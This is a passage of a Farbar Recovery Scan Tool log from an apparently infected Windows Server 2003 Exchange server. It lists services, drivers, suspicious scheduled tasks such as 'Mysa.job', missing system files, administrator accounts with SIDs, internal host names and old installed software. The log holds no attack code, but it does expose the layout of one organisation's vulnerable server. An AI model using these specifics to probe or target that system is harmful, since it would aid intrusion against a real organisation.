S3 RpcLocator; C:\WINDOWS\system32\locator.exe [157184 2007-02-18] (Microsoft Corporation)
S3 RpcLocator; C:\WINDOWS\SysWOW64\locator.exe [71680 2007-02-18] (Microsoft Corporation)
S3 RSoPProv; C:\WINDOWS\system32\RSoPProv.exe [103424 2007-02-18] (Microsoft Corporation)
S3 RSoPProv; C:\WINDOWS\SysWOW64\RSoPProv.exe [67072 2007-02-18] (Microsoft Corporation)
S3 sacsvr; C:\WINDOWS\system32\sacsvr.dll [16896 2007-02-18] (Microsoft Corporation)
R2 SamSs; C:\WINDOWS\system32\lsass.exe [14336 2007-02-18] (Microsoft Corporation)
S3 SCardSvr; C:\WINDOWS\System32\SCardSvr.exe [166400 2007-02-18] (Microsoft Corporation)
S3 SCardSvr; C:\WINDOWS\SysWOW64\SCardSvr.exe [90112 2007-02-18] (Microsoft Corporation)
R2 Schedule; C:\WINDOWS\SysWOW64\schedsvc.dll [202240 2007-02-18] (Microsoft Corporation)
R2 seclogon; C:\WINDOWS\SysWOW64\seclogon.dll [18432 2007-02-18] (Microsoft Corporation)
R2 Server Administrator; C:\Program Files (x86)\Dell\SysMgt\iws\bin\win32\dsm_om_connsvc32.exe [55208 2009-10-22] ()
R2 SNMP; C:\WINDOWS\System32\snmp.exe [60928 2007-02-18] (Microsoft Corporation)
R2 SNMP; C:\WINDOWS\SysWOW64\snmp.exe [40960 2007-02-18] (Microsoft Corporation)
S3 SNMPTRAP; C:\WINDOWS\System32\snmptrap.exe [11264 2007-02-18] (Microsoft Corporation)
R2 Spooler; C:\WINDOWS\system32\spoolsv.exe [111616 2010-08-18] (Microsoft Corporation)
S4 stisvc; C:\WINDOWS\SysWOW64\wiaservc.dll [348160 2007-02-18] (Microsoft Corporation)
S2 SysmonLog; C:\WINDOWS\system32\smlogsvc.exe [133120 2007-02-18] (Microsoft Corporation)
S2 SysmonLog; C:\WINDOWS\SysWOW64\smlogsvc.exe [96256 2007-02-18] (Microsoft Corporation)
S4 TlntSvr; C:\WINDOWS\system32\tlntsvr.exe [113152 2007-02-18] (Microsoft Corporation)
S4 TrkSvr; C:\WINDOWS\system32\trksvr.dll [86528 2007-02-18] (Microsoft Corporation)
S4 TrkSvr; C:\WINDOWS\SysWOW64\trksvr.dll [50688 2007-02-18] (Microsoft Corporation)
R2 TrkWks; C:\WINDOWS\SysWOW64\trkwks.dll [86528 2007-02-18] (Microsoft Corporation)
S4 Tssdis; C:\WINDOWS\System32\tssdis.exe [99840 2007-02-18] (Microsoft Corporation)
S3 UMWdf; C:\WINDOWS\system32\wdfmgr.exe [62976 2007-02-18] (Microsoft Corporation)
S3 UMWdf; C:\WINDOWS\SysWOW64\wdfmgr.exe [39424 2007-02-18] (Microsoft Corporation)
S3 UPS; C:\WINDOWS\System32\ups.exe [34816 2007-02-18] (Microsoft Corporation)
S3 UPS; C:\WINDOWS\SysWOW64\ups.exe [16896 2007-02-18] (Microsoft Corporation)
S3 vds; C:\WINDOWS\System32\vds.exe [613376 2007-02-18] (Microsoft Corporation)
S3 VSS; C:\WINDOWS\System32\vssvc.exe [2062336 2007-02-18] (Microsoft Corporation)
R2 W32Time; C:\WINDOWS\SysWOW64\w32time.dll [227328 2007-02-18] (Microsoft Corporation)
S3 WmdmPmSN; C:\WINDOWS\SysWOW64\mspmsnsv.dll [25088 2007-02-18] (Microsoft Corporation)
S3 Wmi; C:\WINDOWS\System32\advapi32.dll [1066496 2015-06-27] (Microsoft Corporation)
S3 Wmi; C:\WINDOWS\SysWOW64\advapi32.dll [620032 2015-06-27] (Microsoft Corporation)
R2 wuauserv; C:\WINDOWS\system32\wuauserv.dll [12288 2007-02-18] (Microsoft Corporation)
R2 WZCSVC; C:\WINDOWS\System32\wzcsvc.dll [659968 2007-02-18] (Microsoft Corporation)
R2 WZCSVC; C:\WINDOWS\SysWOW64\wzcsvc.dll [489472 2007-02-18] (Microsoft Corporation)
S3 xmlprov; C:\WINDOWS\System32\xmlprov.dll [326144 2007-02-18] (Microsoft Corporation)
S3 xmlprov; C:\WINDOWS\SysWOW64\xmlprov.dll [131584 2007-02-18] (Microsoft Corporation)
S4 HidServ; %SystemRoot%\System32\hidserv.dll [X]
R2 ScanMail_Master; "C:\Program Files\Trend Micro\Smex\svcGenericHost.exe" SMEX_Master.exe .\config\cfg_ipcServerDll1.txt SMEX_HOST [X]
R2 ScanMail_RemoteConfig; "C:\Program Files\Trend Micro\Smex\svcGenericHost.exe" SMEX_RemoteConfig.exe .\config\cfg_ipcServerDll2.txt SMEX_CFG_HOST [X]
R2 ScanMail_SystemWatcher; "C:\Program Files\Trend Micro\Smex\svcGenericHost.exe" SMEX_SystemWatcher.exe .\config\cfg_SystemWatcherManager.txt SMEX_SW [X]
S3 WinHttpAutoProxySvc; winhttp.dll [X]
 
===================== Drivers (Whitelisted) ======================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S4 Abiosdsk; no ImagePath
S4 ACPIEC; C:\Windows\System32\Drivers\ACPIEC.sys [18432 2007-02-18] (Microsoft Corporation)
S4 adpu160m; no ImagePath
S4 adpu320; no ImagePath
S4 aic78u2; no ImagePath
S4 aic78xx; no ImagePath
S4 AliIde; no ImagePath
S4 AmdIde; no ImagePath
S4 arc; no ImagePath
S4 Atdisk; no ImagePath
R3 ati2mtag; C:\WINDOWS\System32\DRIVERS\ati2mtag.sys [2210304 2007-10-17] (ATI Technologies Inc.)
S3 Atmarpc; C:\WINDOWS\System32\DRIVERS\atmarpc.sys [106496 2007-02-18] (Microsoft Corporation)
R3 audstub; C:\WINDOWS\System32\DRIVERS\audstub.sys [5632 2005-03-24] (Microsoft Corporation)
R2 CdaC15BA; C:\WINDOWS\System32\DRIVERS\CdaC15BA.sys [13312 2007-02-18] (Macrovision Corporation, Macrovision Europe Limited, and Macrovision Japan and Asia K.K.)
R2 CdaD10BA; C:\WINDOWS\System32\DRIVERS\CdaD10BA.sys [13312 2007-02-18] (Macrovision Corporation, Macrovision Europe Limited, and Macrovision Japan and Asia K.K.)
S1 Changer; no ImagePath
S4 ClusDisk; C:\WINDOWS\System32\DRIVERS\ClusDisk.sys [112640 2007-02-18] (Microsoft Corporation)
S4 CmdIde; no ImagePath
S4 cpqcissm; no ImagePath
R3 dcdbas; C:\WINDOWS\System32\DRIVERS\dcdbas64.sys [31744 2009-06-12] (Dell Inc.)
R0 DfsDriver; C:\WINDOWS\System32\drivers\Dfs.sys [52736 2007-02-18] (Microsoft Corporation)
S4 dmboot; C:\WINDOWS\System32\drivers\dmboot.sys [415232 2007-02-18] (Microsoft Corporation)
R0 dmio; C:\WINDOWS\System32\drivers\dmio.sys [244224 2007-02-18] (Microsoft Corporation)
R0 dmload; C:\WINDOWS\System32\drivers\dmload.sys [9216 2007-02-18] (Microsoft Corporation)
S4 dpti2o; no ImagePath
R3 e1express; C:\WINDOWS\System32\DRIVERS\e1e5132e.sys [328336 2008-02-07] (Intel Corporation)
S4 elxstor; no ImagePath
R1 Fips; C:\Windows\System32\Drivers\Fips.sys [50176 2007-02-18] (Microsoft Corporation)
R0 Ftdisk; C:\WINDOWS\System32\DRIVERS\ftdisk.sys [240128 2007-02-18] (Microsoft Corporation)
R3 Gpc; C:\WINDOWS\System32\DRIVERS\msgpc.sys [71168 2007-02-18] (Microsoft Corporation)
S4 hpcisss; no ImagePath
S1 i2omgmt; no ImagePath
S4 iirsp; no ImagePath
R1 imapi; C:\WINDOWS\System32\DRIVERS\imapi.sys [72704 2007-02-18] (Microsoft Corporation)
S4 IntelIde; no ImagePath
S3 Ip6Fw; C:\WINDOWS\System32\DRIVERS\Ip6Fw.sys [57856 2007-02-18] (Microsoft Corporation)
R1 IPSec; C:\WINDOWS\System32\DRIVERS\ipsec.sys [156672 2007-02-18] (Microsoft Corporation)
S3 l2nd; C:\WINDOWS\System32\DRIVERS\bxnd52a.sys [64512 2007-10-17] (Broadcom Corporation)
U3 LicenseInfo; no ImagePath
S4 lp6nds35; no ImagePath
R1 mnmdd; C:\Windows\System32\Drivers\mnmdd.sys [8192 2007-02-18] (Microsoft Corporation)
R0 mpdev; C:\WINDOWS\System32\DRIVERS\mpdev.sys [21368 2007-11-22] (Microsoft Corporation)
R0 MpFilter; C:\WINDOWS\System32\DRIVERS\MpFilter.sys [247216 2013-09-10] (Microsoft Corporation)
R1 MpKsl8fadf9b0; C:\WINDOWS\Temp\MpKsl8fadf9b0.sys [44928 2017-09-11] (Microsoft Corporation)
R0 mpspfltr; C:\WINDOWS\System32\DRIVERS\mpspfltr.sys [26168 2008-11-13] (Microsoft Corporation)
S4 mraid35x; no ImagePath
R0 msiscdsm; C:\WINDOWS\System32\DRIVERS\msiscdsm.sys [52280 2008-11-13] (Microsoft Corporation)
S4 nfrd960; no ImagePath
S3 PDCOMP; no ImagePath
S3 PDFRAME; no ImagePath
S3 PDRELI; no ImagePath
S3 PDRFRAME; no ImagePath
R1 PDVFSDriver; C:\WINDOWS\System32\drivers\pdfsd.sys [81496 2013-01-14] (Symantec Corporation)
S4 PDVFSNP; no ImagePath
R0 percsas; C:\WINDOWS\System32\drivers\percsas.sys [27136 2009-01-19] (LSI Corporation)
R3 Ptilink; C:\WINDOWS\System32\DRIVERS\ptilink.sys [31232 2007-02-18] (Parallel Technologies, Inc.)
S4 ql2300; no ImagePath
R3 Raspti; C:\WINDOWS\System32\DRIVERS\raspti.sys [31232 2007-02-18] (Microsoft Corporation)
R1 redbook; C:\WINDOWS\System32\DRIVERS\redbook.sys [64000 2005-03-24] (Microsoft Corporation)
U5 sacdrv; C:\Windows\System32\Drivers\sacdrv.sys [130560 2007-02-18] (Microsoft Corporation)
U5 ScsiPort; C:\WINDOWS\system32\drivers\scsiport.sys [171008 2007-02-18] (Microsoft Corporation)
S4 Simbad; no ImagePath
S4 symc8xx; no ImagePath
S4 symmpi; no ImagePath
S4 sym_hi; no ImagePath
S4 sym_u3; no ImagePath
S4 TosIde; no ImagePath
S4 ultra; no ImagePath
R3 Update; C:\WINDOWS\System32\DRIVERS\update.sys [152576 2007-05-30] (Microsoft Corporation)
S4 ViaIde; no ImagePath
R3 VirtFile; C:\WINDOWS\System32\DRIVERS\VirtFile.sys [115440 2013-01-04] (Symantec Corporation)
S3 WDICA; no ImagePath
S3 WLBS; C:\WINDOWS\System32\DRIVERS\wlbs.sys [280576 2007-02-18] (Microsoft Corporation)
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S4 vsdatant; a [X]
U1 WS2IFSL; no ImagePath
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
NETSVC: Sacsvr -> C:\Windows\system32\sacsvr.dll (Microsoft Corporation)
NETSVC: TrkSvr -> C:\Windows\system32\trksvr.dll (Microsoft Corporation)
NETSVCx32: Browser -> C:\Windows\SysWOW64\browser.dll (Microsoft Corporation)
NETSVCx32: CryptSvc -> C:\Windows\SysWOW64\cryptsvc.dll (Microsoft Corporation)
NETSVCx32: DMServer -> C:\Windows\SysWOW64\dmserver.dll ==> No File
NETSVCx32: EventSystem -> C:\WINDOWS\SysWOW64\es.dll (Microsoft Corporation)
NETSVCx32: HidServ -> C:\Windows\SysWOW64\hidserv.dll ==> No File
NETSVCx32: Iprip -> no filepath.
NETSVCx32: LanmanWorkstation -> C:\Windows\SysWOW64\wkssvc.dll ==> No File
NETSVCx32: Messenger -> C:\Windows\SysWOW64\msgsvc.dll ==> No File
NETSVCx32: Netman -> C:\Windows\SysWOW64\netman.dll (Microsoft Corporation)
NETSVCx32: Sacsvr -> C:\Windows\SysWOW64\sacsvr.dll ==> No File
NETSVCx32: Seclogon -> C:\Windows\SysWOW64\seclogon.dll (Microsoft Corporation)
NETSVCx32: TrkWks -> C:\Windows\SysWOW64\trkwks.dll (Microsoft Corporation)
NETSVCx32: TrkSvr -> C:\Windows\SysWOW64\trksvr.dll (Microsoft Corporation)
NETSVCx32: WZCSVC -> C:\Windows\SysWOW64\wzcsvc.dll (Microsoft Corporation)
NETSVCx32: xmlprov -> C:\Windows\SysWOW64\xmlprov.dll (Microsoft Corporation)
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2017-09-11 11:19 - 2017-09-11 11:19 - 000000000 ____D C:\FRST
2017-09-11 11:07 - 2017-09-11 11:07 - 024968960 _____ C:\Documents and Settings\administrator.CENTRECITY\Desktop\eventlog-Security-20170911.evt
2017-09-11 11:07 - 2017-09-11 11:07 - 016777200 _____ C:\Documents and Settings\administrator.CENTRECITY\Desktop\eventlog-System-20170911.evt
2017-09-11 11:06 - 2017-09-11 11:07 - 041547200 _____ C:\Documents and Settings\administrator.CENTRECITY\Desktop\eventlog-Application-20170911.evt
2017-09-11 10:29 - 2017-09-11 10:29 - 000000000 ____D C:\WINDOWS\pss
2017-09-08 19:55 - 2017-09-11 01:50 - 000000384 ____H C:\WINDOWS\Tasks\Microsoft Antimalware Scheduled Scan.job
2017-09-08 19:50 - 2017-09-11 11:19 - 000000000 ____D C:\Documents and Settings\administrator.CENTRECITY\Local Settings\Temp\1
2017-09-08 19:40 - 2017-09-08 19:40 - 000001945 _____ C:\WINDOWS\epplauncher.mif
2017-09-08 19:33 - 2017-09-08 19:33 - 000001730 _____ C:\Documents and Settings\All Users\Start Menu\Programs\System Center Endpoint Protection.lnk
2017-09-08 19:33 - 2017-09-08 19:33 - 000000000 ____D C:\Program Files\Microsoft Security Client
2017-09-08 19:33 - 2017-09-08 19:33 - 000000000 ____D C:\Program Files (x86)\Microsoft Security Client
2017-09-08 19:08 - 2017-09-08 19:08 - 000009308 _____ C:\Documents and Settings\administrator.CENTRECITY\Desktop\20170908 - Rogue Killer malware report.txt
2017-09-08 19:07 - 2017-09-08 19:07 - 000009310 _____ C:\Documents and Settings\administrator.CENTRECITY\Desktop\20170908 - malware report.txt
2017-09-08 18:25 - 2017-09-08 19:32 - 000000000 ____D C:\Documents and Settings\All Users\Application Data\RogueKiller
2017-09-08 18:25 - 2017-09-08 19:21 - 000028272 _____ C:\WINDOWS\system32\Drivers\TrueSight.sys
2017-09-08 18:25 - 2017-09-08 18:25 - 000000000 ____D C:\Documents and Settings\All Users\Start Menu\Programs\RogueKiller
2017-09-08 18:24 - 2017-09-08 18:25 - 000000000 ____D C:\Program Files\RogueKiller
2017-09-08 18:13 - 2017-09-08 18:13 - 138427338 _____ C:\regedit-201709081813-prelsmoseremoval.reg
2017-09-08 18:00 - 2017-09-08 18:00 - 000060678 _____ C:\Documents and Settings\administrator.CENTRECITY\Desktop\20170908 - changelog.-removed expired certs.txt
2017-09-08 17:45 - 2017-09-08 17:45 - 000014434 _____ C:\Documents and Settings\administrator.CENTRECITY\Desktop\20170908 - changelog.txt
2017-08-25 10:04 - 2017-08-25 10:04 - 041549496 _____ C:\Documents and Settings\administrator.CENTRECITY\Desktop\eventlog-Application-201708251004.evt
2017-08-25 10:04 - 2017-08-25 10:04 - 024968936 _____ C:\Documents and Settings\administrator.CENTRECITY\Desktop\eventlog-Security-201708251004.evt
2017-08-25 10:04 - 2017-08-25 10:04 - 016776656 _____ C:\Documents and Settings\administrator.CENTRECITY\Desktop\eventlog-System-201708251004.evt
2017-08-23 18:07 - 2017-08-23 18:07 - 000020698 _____ C:\Documents and Settings\administrator.CENTRECITY\Desktop\Get-MailboxDatabase-20170823.txt
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2017-09-11 09:52 - 2007-12-14 21:16 - 000000136 _____ C:\WINDOWS\system32\config\netlogon.ftl
2017-09-11 06:16 - 2011-10-07 14:47 - 000000278 _____ C:\WINDOWS\Tasks\defrag X.job
2017-09-11 06:16 - 2010-05-21 06:00 - 000000178 ___SH C:\Documents and Settings\desktop\ntuser.ini
2017-09-11 06:13 - 2010-05-20 15:14 - 000000278 _____ C:\WINDOWS\Tasks\defrag.job
2017-09-11 06:03 - 2008-02-21 18:31 - 000000968 _____ C:\WINDOWS\Tasks\systemstate.job
2017-09-11 06:03 - 2007-12-12 18:12 - 000000000 ____D C:\WINDOWS\system32\NtmsData
2017-09-11 06:00 - 2007-12-10 10:57 - 000000000 ____D C:\WINDOWS\system32\inetsrv
2017-09-11 06:00 - 2007-12-10 10:57 - 000000000 ____D C:\WINDOWS\repair
2017-09-11 05:32 - 2007-12-10 10:57 - 000000000 ____D C:\WINDOWS\Help
2017-09-11 02:15 - 2008-04-10 23:55 - 000000000 ___HD C:\Backup Exec AOFO Store
2017-09-11 01:06 - 2007-12-10 19:28 - 000000000 __SHD C:\Documents and Settings\NetworkService
2017-09-11 01:06 - 2007-12-10 19:28 - 000000000 __SHD C:\Documents and Settings\LocalService
2017-09-11 01:02 - 2007-12-14 21:23 - 000000000 ____D C:\Documents and Settings\administrator.CENTRECITY
2017-09-10 18:32 - 2007-12-10 10:57 - 000000000 ____D C:\WINDOWS\security
2017-09-08 19:54 - 2011-07-25 10:45 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-09-08 19:53 - 2014-01-07 12:21 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-09-08 19:50 - 2007-12-10 11:03 - 001735618 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-09-08 19:45 - 2007-12-10 19:28 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-09-08 19:45 - 2007-12-10 09:50 - 000002206 _____ C:\WINDOWS\system32\wpa.dbl
2017-09-08 19:41 - 2011-09-29 18:29 - 015728640 _____ C:\WINDOWS\system32\config\MOMLog.evt
2017-09-08 19:41 - 2010-04-16 20:13 - 000315601 _____ C:\WINDOWS\TTY_00000000.log.1
2017-09-08 19:41 - 2007-12-14 23:53 - 012517376 _____ C:\WINDOWS\system32\config\PowerShell.evt
2017-09-08 19:41 - 2007-12-14 21:23 - 000000178 ___SH C:\Documents and Settings\administrator.CENTRECITY\ntuser.ini
2017-09-08 19:41 - 2007-12-10 19:28 - 000032548 _____ C:\WINDOWS\Tasks\SchedLgU.Txt
2017-09-08 19:33 - 2007-12-10 10:57 - 000000000 ____D C:\WINDOWS\inf
2017-09-08 18:35 - 2017-06-23 05:32 - 000000330 _____ C:\WINDOWS\Tasks\ok.job
2017-09-08 18:35 - 2017-06-08 17:32 - 000000414 _____ C:\WINDOWS\Tasks\Mysa2.job
2017-09-08 18:34 - 2017-06-08 17:31 - 000000410 _____ C:\WINDOWS\Tasks\Mysa.job
2017-09-08 18:34 - 2017-06-08 17:31 - 000000334 _____ C:\WINDOWS\Tasks\Mysa1.job
2017-09-08 18:28 - 2008-10-11 20:47 - 000000000 ____D C:\Program Files\EqualLogic
 
==================== Files in the root of some directories =======
 
2007-12-14 23:32 - 2007-12-14 23:32 - 011519569 _____ () C:\Program Files\Microsoft.zip
2009-10-06 00:14 - 2009-10-06 00:14 - 000000036 _____ () C:\Documents and Settings\administrator.CENTRECITY\Local Settings\Application Data\housecall.guid.cache
 
==================== Bamital & volsnap ======================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe IS MISSING <==== ATTENTION
C:\WINDOWS\SysWOW64\wininit.exe IS MISSING <==== ATTENTION
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
C:\WINDOWS\system32\codeintegrity\Bootcat.cache IS MISSING <==== ATTENTION
 
 
ATTENTION: ==> Could not access BCD. 
 
==================== End of FRST.txt ============================

 

 

 

#################Addition LOG below##########

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 11-09-2017
Ran by administrator (11-09-2017 11:20:09)
Running from \\MYSERVER-arch-01\Install\Apps\antivirus
Microsoft Windows Server 2003 R2 Service Pack 2 (X64) (2007-12-11 02:26:28)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-1361566594-692788083-1720729673-500 - Administrator - Enabled) => %SystemDrive%\Documents and Settings\Administrator
Guest (S-1-5-21-1361566594-692788083-1720729673-501 - Limited - Disabled)
IUSR_MYSERVER-EXCH-01 (S-1-5-21-1361566594-692788083-1720729673-1004 - Limited - Enabled)
IWAM_MYSERVER-EXCH-01 (S-1-5-21-1361566594-692788083-1720729673-1005 - Limited - Enabled)
SUPPORT_388945a0 (S-1-5-21-1361566594-692788083-1720729673-1001 - Limited - Disabled)
sysadmin (S-1-5-21-1361566594-692788083-1720729673-1003 - Administrator - Enabled)
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
Active Directory Management Pack Helper Object (HKLM\...\{3696BAB3-3B1B-42C3-8D46-1898E59E7C84}) (Version: 1.1.0 - Microsoft Corporation)
Adobe Flash Player 19 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 19.0.0.185 - Adobe Systems Incorporated)
ATI Display Driver (HKLM\...\ATI Display Driver) (Version: 8.24.3-060405a-041210C-Dell - )
Dell OpenManage Server Administrator (HKLM-x32\...\{54C04D53-C3C3-46EA-A75F-7AFF4BEB727C}) (Version: 6.2.0 - Dell)
Intel® Network Connections Drivers (HKLM\...\PROSet) (Version:  - )
Java 8 Update 91 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218091F0}) (Version: 8.0.910.14 - Oracle Corporation)
Java™ 6 Update 7 (HKLM-x32\...\{3248F0A8-6813-11D6-A77B-00B0D0160070}) (Version: 1.6.0.70 - Sun Microsystems, Inc.)
LiveUpdate 3.3 (Symantec Corporation) (HKLM-x32\...\LiveUpdate) (Version: 3.3.0.71 - Symantec Corporation)
Messaging API and Collaboration Data Objects 1.2.1 (HKLM-x32\...\{5A8751A2-684E-4D42-846C-3A58CE36C1F9}) (Version: 6.5.7974.0 - Microsoft)
Microsoft .NET Framework 2.0 Service Pack 2 (HKLM\...\{C09FB3CD-3D0C-3F2D-899A-6A1D67F2073F}) (Version: 2.2.30729 - Microsoft Corporation)
Microsoft .NET Framework 3.0 Service Pack 2 (HKLM\...\{A3051CD0-2F64-3813-A88D-B8DCCDE8F8C7}) (Version: 3.2.30729 - Microsoft Corporation)
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)
Microsoft Exchange Server 2007 (HKLM\...\Microsoft Exchange) (Version: 8.2.176.2 - Microsoft Corporation)
Microsoft Exchange User Monitor (HKLM-x32\...\{75189587-0D84-4404-8F02-79C39728FA64}) (Version: 14.0.611.0 - Microsoft Corporation)
Microsoft Full Text Indexing Engine for Exchange (HKLM\...\{6574FDC2-40FC-405A-9554-22D1CE15686B}) (Version: 8.2.176.0 - Microsoft Corporation)
Microsoft SQL Server 2005 (HKLM-x32\...\Microsoft SQL Server 2005) (Version:  - Microsoft Corporation)
Microsoft SQL Server Native Client (HKLM\...\{9ACF3FDB-C8E6-444C-8C64-13A221F7BFFD}) (Version: 9.00.5000.00 - Microsoft Corporation)
Microsoft SQL Server Setup Support Files (English) (HKLM-x32\...\{53F5C3EE-05ED-4830-994B-50B2F0D50FCE}) (Version: 9.00.5000.00 - Microsoft Corporation)
Microsoft SQL Server VSS Writer (HKLM\...\{B636C9B9-A3F2-4DCE-ADCC-72E095018385}) (Version: 9.00.5000.00 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x64 8.0.50727.4053 (HKLM\...\{B6E3757B-5E77-3915-866A-CCFC4B8D194C}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM-x32\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) - KB2467175 (HKLM\...\{aac9fcc4-dd9e-4add-901c-b5496a07ab2e}) (Version: 8.0.51011 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6E8E85E8-CE4B-4FF5-91F7-04999C9FAE6A}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Mozilla Firefox 47.0.2 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 47.0.2 (x86 en-US)) (Version: 47.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 47.0.2.6148 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 6 Service Pack 2 (KB2957482) (HKLM\...\{A4F464A5-9DAC-44B6-A78C-E25C5BB97B25}) (Version: 6.20.2017.0 - Microsoft Corporation)
RogueKiller version 12.11.13.0 (HKLM\...\8B3D7924-ED89-486B-8322-E8594065D5CB_is1) (Version: 12.11.13.0 - Adlice Software)
Symantec Backup Exec Remote Agent for Windows Systems (HKLM\...\{2E214FDB-1B99-4BF3-BEE4-43B82EB1D6AE}) (Version: 13.0.5204 - Symantec Corporation) Hidden
Symantec Backup Exec Remote Agent for Windows Systems (HKLM\...\Remote Agent for Windows Servers) (Version: 13.0.5204 - Symantec Corporation)
System Center Endpoint Protection (HKLM\...\Microsoft Security Client) (Version: 4.3.220.0 - Microsoft Corporation)
System Center Operations Manager 2007 Agent (HKLM\...\{E7600A9C-6782-4221-984E-AB89C780DC2D}) (Version: 6.0.6278.0 - Microsoft Corporation)
Trend Micro ScanMail for Microsoft Exchange (HKLM\...\{E5B262F1-1EA7-4DEF-978D-7B3353941D85}) (Version: 10.2.1135 - Trend Micro Incorporated) Hidden
Trend Micro ScanMail for Microsoft Exchange (HKLM\...\SMEX_{E5B262F1-1EA7-4DEF-978D-7B3353941D85}) (Version: 10.2.1135 - Trend Micro Incorporated)
Update for Windows Server 2003 (KB2141007) (HKLM\...\KB2141007) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB2345886) (HKLM\...\KB2345886) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB2467659) (HKLM\...\KB2467659) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB2607712) (HKLM\...\KB2607712) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB2616676-v2) (HKLM\...\KB2616676-v2) (Version: 2 - Microsoft Corporation)
Update for Windows Server 2003 (KB2641690-v2) (HKLM\...\KB2641690-v2) (Version: 2 - Microsoft Corporation)
Update for Windows Server 2003 (KB2661254) (HKLM\...\KB2661254) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB2748349) (HKLM\...\KB2748349) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB2749655) (HKLM\...\KB2749655) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB2863058) (HKLM\...\KB2863058) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB2904266) (HKLM\...\KB2904266) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB2981580) (HKLM\...\KB2981580) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB2993651) (HKLM\...\KB2993651) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB3065979) (HKLM\...\KB3065979) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB927891) (HKLM\...\KB927891) (Version: 5 - Microsoft Corporation)
Update for Windows Server 2003 (KB932596) (HKLM\...\KB932596) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB933360) (HKLM\...\KB933360) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB936357) (HKLM\...\KB936357) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB942763) (HKLM\...\KB942763) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB942840) (HKLM\...\KB942840) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB948496) (HKLM\...\KB948496) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB951072-v2) (HKLM\...\KB951072-v2) (Version: 2 - Microsoft Corporation)
Update for Windows Server 2003 (KB955759) (HKLM\...\KB955759) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB955839) (HKLM\...\KB955839) (Version: 1 - Microsoft Corporation)
